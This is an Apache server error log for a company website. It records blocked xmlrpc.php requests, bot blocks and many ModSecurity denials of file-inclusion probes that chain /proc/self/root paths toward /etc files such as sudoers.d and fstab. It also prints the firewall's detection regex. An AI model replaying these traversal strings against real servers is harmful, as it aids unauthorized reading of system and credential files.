[Wed Mar 18 11:25:01.390145 2026] [access_compat:error] [pid 19507:tid 140411624429312] [client 195.123.216.134:51560] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:03.551292 2026] [access_compat:error] [pid 26799:tid 140411674785536] [client 156.146.63.166:59202] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:18.578988 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:51110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq1zsdf6f5d65gmYZTcRQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 11:25:20.674719 2026] [access_compat:error] [pid 26799:tid 140411649607424] [client 84.239.17.156:46835] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:26.195417 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:45520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq11imAPhZkrhU8w4l0hAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:25:27.673876 2026] [access_compat:error] [pid 31803:tid 140411590858496] [client 185.220.101.29:62808] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:27.814789 2026] [access_compat:error] [pid 31803:tid 140411725141760] [client 46.165.194.56:51468] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:52.323136 2026] [access_compat:error] [pid 29882:tid 140411641214720] [client 165.231.182.151:43547] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:53.679106 2026] [access_compat:error] [pid 17887:tid 140411699963648] [client 51.210.105.30:36731] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:53.716464 2026] [access_compat:error] [pid 11816:tid 140411574073088] [client 203.55.81.2:55720] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:55.730824 2026] [access_compat:error] [pid 29882:tid 140411582465792] [client 23.129.64.192:42769] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:25:57.176159 2026] [access_compat:error] [pid 17887:tid 140411649607424] [client 91.90.124.152:54471] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:26:15.772857 2026] [access_compat:error] [pid 29882:tid 140411624429312] [client 45.250.255.32:17554] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:26:19.368624 2026] [access_compat:error] [pid 31803:tid 140411599251200] [client 84.239.47.21:54642] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:26:46.582852 2026] [mime_magic:error] [pid 19507:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:63929] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:26:52.698166 2026] [mime_magic:error] [pid 17887:tid 140411590858496] (70014)End of file found: [client 57.141.18.105:57306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:27:23.228220 2026] [:error] [pid 15051:tid 140411540502272] [client 216.73.216.191:58744] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //lib64/mysql/mecab/etc/mecabrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq2SymAPhZkrhU8w4l06QAAAJg"]
[Wed Mar 18 11:27:56.613838 2026] [access_compat:error] [pid 15826:tid 140411624429312] [client 195.123.216.134:36812] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:03.791123 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:60682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq2c8df6f5d65gmYZTc8wAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:28:10.247295 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:43962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq2euyqAr6etmhZHNrJyAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:28:14.178807 2026] [mime_magic:error] [pid 17653:tid 140411557287680] (70014)End of file found: [client 57.141.18.38:33066] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:28:15.989491 2026] [access_compat:error] [pid 30077:tid 140411565680384] [client 45.154.153.27:35727] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:41.326076 2026] [access_compat:error] [pid 11816:tid 140411582465792] [client 172.111.157.149:12589] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:44.330983 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.228.61:45732] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq2nNY0UrI5A3LftIy2IQAAAYE"]
[Wed Mar 18 11:28:45.993589 2026] [access_compat:error] [pid 31803:tid 140411574073088] [client 149.50.217.133:26249] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:47.467165 2026] [access_compat:error] [pid 19507:tid 140411716749056] [client 191.96.168.18:47721] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:48.866964 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.244.43:53632] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq2oMdf6f5d65gmYZTdBgAAAtA"]
[Wed Mar 18 11:28:57.720064 2026] [access_compat:error] [pid 15826:tid 140411725141760] [client 192.42.116.96:27514] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:28:58.714624 2026] [access_compat:error] [pid 11816:tid 140411725141760] [client 51.210.104.116:55299] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:29:11.730433 2026] [mime_magic:error] [pid 30077:tid 140411599251200] (70014)End of file found: [client 57.141.18.23:35076] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:29:18.826889 2026] [access_compat:error] [pid 31803:tid 140411616036608] [client 45.91.250.107:39754] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Wed Mar 18 11:29:25.241785 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 57.141.18.82:35612] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:30:40.095263 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:49948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3ENa6ubjKNq_cu4ajBAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:31:29.113799 2026] [mime_magic:error] [pid 30077:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:60053] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:31:29.959625 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:51640] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root
[Wed Mar 18 11:31:39.689557 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:49788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3S-yqAr6etmhZHNrKbQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 11:31:46.320630 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:44148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3Uuw_le52K8_3pV3oBgAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:47.824013 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:37686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3U-yqAr6etmhZHNrKcAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:49.086365 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:37692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3VdY0UrI5A3LftIy2_gAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:50.351386 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:48098] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3VtY0UrI5A3LftIy3AQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:51.670802 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:48112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3V_u8EFLIOrSqIpsLxAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:54.895800 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:48124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3WgkwaGbbGflqUZAX6wAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:57.653881 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:48128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3Xcdf6f5d65gmYZTdjwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:31:59.158137 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:48130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3XymAPhZkrhU8w4l1hgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:32:00.555255 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.243.128:47076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq3YNY0UrI5A3LftIy3CQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
